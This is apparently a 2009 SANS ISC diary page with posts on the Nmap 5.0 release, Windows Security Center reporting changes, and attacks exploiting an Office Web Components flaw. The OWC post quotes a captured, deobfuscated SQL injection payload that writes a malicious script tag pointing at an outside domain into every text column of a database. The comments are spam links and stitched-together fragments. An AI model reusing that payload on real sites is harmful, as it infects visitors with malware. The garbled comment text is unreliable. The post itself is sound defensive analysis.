Nmap 5.0 released

Published: 2009-07-16
Last Updated: 2009-07-16 17:51:07 UTC
by Bojan Zdrnja (Version: 1)
1 comment(s)

One of the must have tools for every person doing anything related to IT security is definitely Nmap (I mean, which other tool, besides an SSH exploit Trinity used as well (and that wasn't a fake SSH exploit like the one released couple of days ago)). The Nmap developers work hard on this latest version which includes some very cool things like the Nmap Scripting Engine (NSE) which we even used to detect machines infected with the Conficker worm.

There are a lot of other neat new features and improvements, so don't wait and go to http://nmap.org/5/ to download your copy of Nmap.

--
Bojan

Keywords: nmap
1 comment(s)

Changes in Windows Security Center

Published: 2009-07-16
Last Updated: 2009-07-16 11:10:42 UTC
by Guy Bruneau (Version: 1)
1 comment(s)

An ISC reader wrote in about a change that occurred this month with the Windows Security Center (WSC) where Microsoft expired the grace period used by vendors to report AV, firewall or anti-spyware status to the WSC. The new WSC API used to report to the WSC was supposed to expire in September 2009. The new API is a result of an interface change introduce in Windows Vista SP1 and part of Windows 7, replacing the API that was part of Vista's original release.

If you are seeing a red shield in the bottom right corner, your Malware Protection tab maybe indicating your AV "is on but it is reporting its status to Windows Security Center in a format that is no longer supported. Use the program's automatic updating feature, or contact the program manufacturer for an updated version".

The grace period to update to the new API to report the correct status to the WSC in Vista SP1 has expired earlier than anticipated, causing confusion on whether your vendor security software is protecting your PC.

This does not mean your AV, firewall or anti-spyware is not working and protecting your system but that it is no longer able to report correctly its status through the WSC. Monitor the WSC status regularly to ensure your AV, firewall or anti-spyware are updated on schedule and functioning properly.

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Teaching Comprehensive Packet Analysis in Ottawa, ON this coming September

1 comment(s)

OWC exploits used in SQL injection attacks

Published: 2009-07-16
Last Updated: 2009-07-16 08:38:21 UTC
by Bojan Zdrnja (Version: 1)
0 comment(s)

As we thought, it was just a matter of time before more attackers start exploiting the still unpatched Office Web Components vulnerability.

While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent a log of an SQL injection attempt to his web site. The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code:

';DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));
EXEC(@S);

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.

The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detecting it, luckily, some major AV vendors are there.

If you haven't set those killbits yet, be sure that you do know because the number of sites exploiting this vulnerability will probably rise exponentially soon.

--
Bojan

0 comment(s)

Comments

What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
https://defineprogramming.com/
https://defineprogramming.com/
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
Enter corthrthmment here...

Diary Archives